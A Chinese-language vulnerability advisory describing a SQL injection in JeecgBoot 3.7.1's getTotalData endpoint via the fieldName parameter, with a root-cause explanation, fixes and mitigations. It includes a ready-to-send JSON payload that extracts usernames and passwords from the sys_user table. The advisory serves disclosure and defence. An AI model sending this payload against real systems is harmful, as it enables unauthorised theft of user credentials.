JeecgBoot SQL注入漏洞分析与修复方案

问题概述

JeecgBoot 3.7.1版本中存在一个需要关注的数据查询问题，可能导致系统执行非预期的SQL查询。该问题存在于/jeecg-boot/drag/onlDragDatasetHead/getTotalData接口中，由于对用户输入的fieldName参数未进行充分验证，可能导致系统执行非预期的数据库查询。

问题原理分析

该问题属于数据查询方面的安全隐患，具体表现为：

1. 系统在处理fieldName参数时，未对用户输入进行充分的验证
2. 可能利用concat等SQL函数拼接查询条件
3. 通过0x3a等编码方式可能绕过部分验证机制
4. 构造的查询可能获取数据库中的信息

问题利用方式

可能出现如下请求：

{
  "tableName":"sys_user",
  "compName":"test",
  "condition":{"filter":{}},
  "config":{
    "assistValue":[],
    "assistType":[],
    "name":[
      {"fieldName":"concat(username,0x3a,password)","fieldType":"string"},
      {"fieldName":"id","fieldType":"string"}
    ],
    "value":[
      {"fieldName":"id","fieldType":"1"}
    ],
    "type":[]
  }
}

在这个请求中，通过concat(username,0x3a,password)构造了一个查询，将sys_user表中的用户名和密码字段拼接在一起返回，其中0x3a是冒号":"的编码表示。

问题影响评估

该问题的影响需要重视，可能包括：

1. 可能获取数据库中的信息
2. 可能导致系统执行非预期的操作
3. 在数据库配置不当的情况下，可能产生更严重的影响
4. 可能导致信息泄露等后果

修复方案

针对该问题，开发团队已经确认并将在下个版本中改进。建议采取以下改进措施：

1. 参数验证：对fieldName等用户输入参数进行严格验证，只允许特定的字符集
2. 预编译语句：使用预编译的SQL语句，避免直接拼接用户输入
3. 权限控制：数据库连接使用适当权限账户
4. 输入验证：实现白名单机制，只允许特定的字段名
5. ORM框架：考虑使用成熟的ORM框架，减少手写SQL的机会

临时缓解措施

在官方更新发布前，可以采取以下临时措施降低风险：

1. 在应用层添加规则，拦截包含可疑内容的请求
2. 临时限制/jeecg-boot/drag/onlDragDatasetHead/getTotalData接口的访问
3. 加强数据库监控，关注异常查询行为

安全建议

对于使用JeecgBoot框架的开发团队，建议：

1. 及时更新到改进后的版本
2. 定期进行代码审查和测试
3. 建立完善的开发流程
4. 对开发人员进行安全编码培训
5. 实施多层防护策略，不依赖单一措施

该问题的发现和改进提醒我们，在开发过程中需要重视数据处理的安全性，特别是在处理用户输入时，必须实施严格的控制措施。